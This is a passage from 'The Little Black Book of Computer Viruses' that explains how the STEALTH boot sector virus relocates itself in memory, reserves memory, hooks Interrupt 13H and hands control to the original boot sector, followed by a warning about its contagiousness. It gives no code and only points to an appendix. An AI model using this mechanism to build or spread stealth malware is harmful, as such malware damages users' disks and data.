sector (and it loads whatever is placed at Track 0, Head 0, Sector

1), that sector first moves itself into the highest 512 bytes of

memory (within the 640 kilobyte limit). In a machine with 640K

of memory, the first unoccupied byte of memory is at A000:0000.

(A) Viral boot sector

moves itself to high

memory.

(B) Viral boot sector

loads the rest of virus

and old boot sector.

(C) Viral boot sector

installs Int 13H and

moves old boot

sector to execute.

Viral BS

Viral BS

A000:0000

0000:7C00

Viral BS

Old BS

Main

Body of

Virus

F000:2769

A000:0000

9820:7000

0000:004C

A000:0000

9820:7000

0000:004C

0000:7C00

Viral BS

Main

Body of

Virus

Old BS

9820:0054

Figure 17: The Virus in RAM.

Case Number Four: A Sophisticated Boot Sector Virus 93

The boot sector will move itself to the first 512 bytes just below

this. Since that sector was compiled with an offset of 7C00 Hex, it

must relocate to 9820:7C00 Hex (which is right below A000:0000),

as desired. Next, the viral boot sector will read the 6 sector long

main body of the virus into memory just below this, from

9820:7000 to 9820:7BFF. The original boot sector occupies

9820:7A00 to 9820:7BFF (since it is the sixth of six sectors loaded).

The viral boot sector then subtracts 4 from the byte at 0040:0013H

to reserve 4 kilobytes of memory for the virus. Next, the viral boot

sector reroutes Interrupt 13H to the virus. Finally, it moves the

original boot sector from 9820:7A00 to 0000:7C00 and executes it.

The original boot sector proceeds to load DOS and get the computer

up and running, oblivious to the fact that the system is infected.

A Word of Caution

The STEALTH virus code is listed in Appendix E. At the

risk of sounding like a broken record, I will say this virus is highly

contagious. You simply don't know when it is there. It hides itself

pretty well, and once it's infected several disks, it is easy to forget

where it's gone. At that point, you can kiss it goodbye. Once a

floppy disk is infected, you should reformat it to get rid of the virus.

If your hard disk gets infected, the safest way to be rid of it is to do

a low level format of Track 0, Head 0. Of course, IDE drives won't

let you do that too easily. Alternatively, you can write a program

that will save and restore your partition sector, or you can run

FDISK on the drive to overwrite the partition sector. Overwriting

the partition sector will keep the virus from executing, but it won't

clean all its code off your system. Obviously, if you're going to

experiment with this virus, I suggest you only do so on a system

where you can afford to lose all your data. Experiment with this

virus at your own risk!

94 The Little Black Book of Computer Viruses

Click Here To Continue to Part 2 Of this Book

EBooks Home Page